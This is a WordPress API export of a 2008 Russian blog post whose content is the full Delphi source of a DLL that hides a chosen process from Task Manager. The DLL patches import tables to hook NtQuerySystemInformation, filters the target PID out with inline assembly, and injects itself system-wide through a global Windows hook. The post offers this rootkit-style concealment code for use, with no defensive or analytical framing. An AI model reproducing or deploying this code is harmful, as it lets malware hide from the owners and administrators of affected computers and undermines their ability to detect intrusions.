{"id":834,"date":"2008-05-30T19:20:08","date_gmt":"2008-05-30T19:20:08","guid":{"rendered":"http:\/\/6teen.ru\/?p=700"},"modified":"2008-05-30T19:20:08","modified_gmt":"2008-05-30T19:20:08","slug":"1943","status":"publish","type":"post","link":"http:\/\/pblog.ru\/lab\/?p=834","title":{"rendered":"\u0421\u043a\u0440\u044b\u0442\u044c \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0443 \u0442\u043e\u043b\u044c\u043a\u043e \u0438\u0437 \u0432\u043a\u043b\u0430\u0434\u043a\u0438 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u044b"},"content":{"rendered":"<p>\u0421\u043a\u0440\u044b\u0442\u044c \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0443 \u0442\u043e\u043b\u044c\u043a\u043e \u0438\u0437 \u0432\u043a\u043b\u0430\u0434\u043a\u0438 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u044b<br \/>\n<!--more--><\/p>\n<pre class=\"alt2\" style=\"margin:0px; padding:6px; border:1px inset; width:580px; height:320px; overflow:auto\"><div>\u0421\u043a\u0440\u044b\u0442\u044c \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0443 \u0442\u043e\u043b\u044c\u043a\u043e \u0438\u0437 \u0432\u043a\u043b\u0430\u0434\u043a\u0438 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u044b\n\n\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f DLL.\n\n\u043e\u0431\u044a\u044f\u0432\u043b\u0435\u043d\u0438\u0435\n\nTHideProc = function (pid: DWORD; HideOnlyFromTaskManager: BOOL): BOOL; stdcall;\n\nlibrary nthide;\n\nuses Windows, SysUtils, ImageHlp, TlHelp32;\n\ntype SYSTEM_INFORMATION_CLASS = (\nSystemBasicInformation,\nSystemProcessorInformation,\nSystemPerformanceInformation,\nSystemTimeOfDayInformation,\nSystemNotImplemented1,\nSystemProcessesAndThreadsInformation,\nSystemCallCounts,\nSystemConfigurationInformation,\nSystemProcessorTimes,\nSystemGlobalFlag,\nSystemNotImplemented2,\nSystemModuleInformation,\nSystemLockInformation,\nSystemNotImplemented3,\nSystemNotImplemented4,\nSystemNotImplemented5,\nSystemHandleInformation,\nSystemObjectInformation,\nSystemPagefileInformation,\nSystemInstructionEmulationCounts,\nSystemInvalidInfoClass1,\nSystemCacheInformation,\nSystemPoolTagInformation,\nSystemProcessorStatistics,\nSystemDpcInformation,\nSystemNotImplemented6,\nSystemLoadImage,\nSystemUnloadImage,\nSystemTimeAdjustment,\nSystemNotImplemented7,\nSystemNotImplemented8,\nSystemNotImplemented9,\nSystemCrashDumpInformation,\nSystemExceptionInformation,\nSystemCrashDumpStateInformation,\nSystemKernelDebuggerInformation,\nSystemContextSwitchInformation,\nSystemRegistryQuotaInformation,\nSystemLoadAndCallImage,\nSystemPrioritySeparation,\nSystemNotImplemented10,\nSystemNotImplemented11,\nSystemInvalidInfoClass2,\nSystemInvalidInfoClass3,\nSystemTimeZoneInformation,\nSystemLookasideInformation,\nSystemSetTimeSlipEvent,\nSystemCreateSession,\nSystemDeleteSession,\nSystemInvalidInfoClass4,\nSystemRangeStartInformation,\nSystemVerifierInformation,\nSystemAddVerifier,\nSystemSessionProcessesInformation\n);\n\n_IMAGE_IMPORT_DESCRIPTOR = packed record\n  case Integer of\n   0:(\n    Characteristics: DWORD);\n   1:(\n    OriginalFirstThunk:DWORD;\n    TimeDateStamp:DWORD;\n    ForwarderChain: DWORD;\n    Name: DWORD;\n    FirstThunk: DWORD);\n   end;\nIMAGE_IMPORT_DESCRIPTOR=_IMAGE_IMPORT_DESCRIPTOR;\nPIMAGE_IMPORT_DESCRIPTOR=^IMAGE_IMPORT_DESCRIPTOR;\n\nPFARPROC=^FARPROC;\n\nprocedure ReplaceIATEntryInOneMod(pszCallerModName: Pchar; pfnCurrent: FarProc; pfnNew: FARPROC; hmodCaller: hModule);\nvar     ulSize: ULONG;\n   pImportDesc: PIMAGE_IMPORT_DESCRIPTOR;\n    pszModName: PChar;\n        pThunk: PDWORD; ppfn:PFARPROC;\n        ffound: LongBool;\n       written: DWORD;\nbegin\npImportDesc:= ImageDirectoryEntryToData(Pointer(hmodCaller), TRUE,IMAGE_DIRECTORY_ENTRY_IMPORT, ulSize);\n  if pImportDesc = nil then exit;\n  while pImportDesc.Name<>0 do\n   begin\n    pszModName := PChar(hmodCaller + pImportDesc.Name);\n     if (lstrcmpiA(pszModName, pszCallerModName) = 0) then break;\n    Inc(pImportDesc);\n   end;\n  if (pImportDesc.Name = 0) then exit;\npThunk := PDWORD(hmodCaller + pImportDesc.FirstThunk);\n  while pThunk^<>0 do\n   begin\n    ppfn := PFARPROC(pThunk);\n    fFound := (ppfn^ = pfnCurrent);\n     if (fFound) then\n      begin\n       VirtualProtectEx(GetCurrentProcess,ppfn,4,PAGE_EXECUTE_READWRITE,written);\n       WriteProcessMemory(GetCurrentProcess, ppfn, @pfnNew, sizeof(pfnNew), Written);\n       exit;\n      end;\n    Inc(pThunk);\n   end;\nend;\n\nvar\naddr_NtQuerySystemInformation: Pointer;\nmypid: DWORD;\nfname: PCHAR;\nmapaddr: PDWORD;\nhideOnlyTaskMan: PBOOL;\n\nfunction myNtQuerySystemInfo(SystemInformationClass: SYSTEM_INFORMATION_CLASS; SystemInformation: Pointer;\nSystemInformationLength:ULONG; ReturnLength:PULONG):LongInt; stdcall;\nlabel onceagain, getnextpidstruct, quit, fillzero;\nasm\npush ReturnLength\npush SystemInformationLength\npush SystemInformation\npush dword ptr SystemInformationClass\ncall dword ptr [addr_NtQuerySystemInformation]\nor eax,eax\njl quit\ncmp SystemInformationClass, SystemProcessesAndThreadsInformation\njne quit\n\nonceagain:\nmov esi, SystemInformation\n\ngetnextpidstruct:\nmov ebx, esi\ncmp dword ptr [esi],0\nje quit\nadd esi, [esi]\nmov ecx, [esi+44h]\ncmp ecx, mypid\njne getnextpidstruct\nmov edx, [esi]\ntest edx, edx\nje fillzero\nadd [ebx], edx\njmp onceagain\n\nfillzero:\nand [ebx], edx\njmp onceagain\n\nquit:\nmov Result, eax\nend;\n\nprocedure InterceptFunctions;\nvar hSnapShot: THandle;\n         me32: MODULEENTRY32;\nbegin\naddr_NtQuerySystemInformation:=GetProcAddress(getModuleHandle('ntdll.dll'),'NtQuerySystemInformation');\nhSnapShot:=CreateToolHelp32SnapShot(TH32CS_SNAPMODULE,GetCurrentProcessId);\n  if hSnapshot=INVALID_HANDLE_VALUE then exit;\n   try\n    ZeroMemory(@me32,sizeof(MODULEENTRY32));\n    me32.dwSize:=sizeof(MODULEENTRY32);\n    Module32First(hSnapShot,me32);\n     repeat\n      ReplaceIATEntryInOneMod('ntdll.dll',addr_NtQuerySystemInformation,@MyNtQuerySystemInfo,me32.hModule);\n     until not Module32Next(hSnapShot,me32);\n   finally\n    CloseHandle(hSnapShot);\n   end;\nend;\n\nprocedure UninterceptFunctions;\nvar hSnapShot: THandle;\n         me32: MODULEENTRY32;\nbegin\naddr_NtQuerySystemInformation:=GetProcAddress(getModuleHandle('ntdll.dll'),'NtQuerySystemInformation');\nhSnapShot:=CreateToolHelp32SnapShot(TH32CS_SNAPMODULE,GetCurrentProcessId);\n  if hSnapshot=INVALID_HANDLE_VALUE then exit;\n  try\n   ZeroMemory(@me32,sizeof(MODULEENTRY32));\n   me32.dwSize:=sizeof(MODULEENTRY32);\n   Module32First(hSnapShot,me32);\n    repeat\n     ReplaceIATEntryInOneMod('ntdll.dll',@MyNtQuerySystemInfo,addr_NtQuerySystemInformation,me32.hModule);\n    until not Module32Next(hSnapShot,me32);\n  finally\n   CloseHandle(hSnapShot);\n  end;\nend;\n\n\nvar HookHandle: THandle;\n\nfunction CbtProc(code: integer; wparam: integer; lparam: integer):Integer; stdcall;\nbegin\nResult:=0;\nend;\n\nprocedure InstallHook; stdcall;\nbegin\nHookHandle:=SetWindowsHookEx(WH_CBT, @CbtProc, HInstance, 0);\nend;\n\nvar hFirstMapHandle:THandle;\n\nfunction HideProcess(pid:DWORD; HideOnlyFromTaskManager:BOOL):BOOL; stdcall;\nvar addrMap: PDWORD;\n       ptr2: PBOOL;\nbegin\nmypid:=0;\nresult:=false;\nhFirstMapHandle:=CreateFileMapping($FFFFFFFF,nil,PAGE_READWRITE,0,8,'NtHideFileMapping');\n  if hFirstMapHandle=0 then exit;\naddrMap:=MapViewOfFile(hFirstMapHandle,FILE_MAP_WRITE,0,0,8);\n  if addrMap=nil then\n   begin\n    CloseHandle(hFirstMapHandle);\n    exit;\n   end;\naddrMap^:=pid;\nptr2:=PBOOL(DWORD(addrMap)+4);\nptr2^:=HideOnlyFromTaskManager;\nUnmapViewOfFile(addrMap);\nInstallHook;\nresult:=true;\nend;\n\nexports\nHideProcess;\n\nvar\nhmap: THandle;\n\nprocedure LibraryProc(Reason: Integer);\nbegin\nif Reason = DLL_PROCESS_DETACH then\n  if mypid > 0 then\n   UninterceptFunctions()\nelse\n  CloseHandle(hFirstMapHandle);\nend;\n\nbegin\nhmap:=OpenFileMapping(FILE_MAP_READ,false,'NtHideFileMapping');\n  if hmap=0 then exit;\n  try\n   mapaddr:=MapViewOfFile(hmap,FILE_MAP_READ,0,0,0);\n    if mapaddr=nil then exit;\n   mypid:=mapaddr^;\n   hideOnlyTaskMan:=PBOOL(DWORD(mapaddr)+4);\n    if hideOnlyTaskMan^ then\n     begin\n      fname:=allocMem(MAX_PATH+1);\n      GetModuleFileName(GetModuleHandle(nil),fname,MAX_PATH+1);\n       if not (ExtractFileName(fname)='taskmgr.exe') then exit;\n     end;\n   InterceptFunctions;\n  finally\n   UnmapViewOfFile(mapaddr);\n   CloseHandle(Hmap);\n   DLLProc:=@LibraryProc;\n  end;\nend.\n<\/div><\/pre>\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u0421\u043a\u0440\u044b\u0442\u044c \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0443 \u0442\u043e\u043b\u044c\u043a\u043e \u0438\u0437 \u0432\u043a\u043b\u0430\u0434\u043a\u0438 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u044b<\/p>\n","protected":false},"author":3,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[448,453],"tags":[1246,936,1649,1732,337],"_links":{"self":[{"href":"http:\/\/pblog.ru\/lab\/index.php?rest_route=\/wp\/v2\/posts\/834"}],"collection":[{"href":"http:\/\/pblog.ru\/lab\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/pblog.ru\/lab\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/pblog.ru\/lab\/index.php?rest_route=\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"http:\/\/pblog.ru\/lab\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=834"}],"version-history":[{"count":0,"href":"http:\/\/pblog.ru\/lab\/index.php?rest_route=\/wp\/v2\/posts\/834\/revisions"}],"wp:attachment":[{"href":"http:\/\/pblog.ru\/lab\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=834"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/pblog.ru\/lab\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=834"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/pblog.ru\/lab\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=834"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}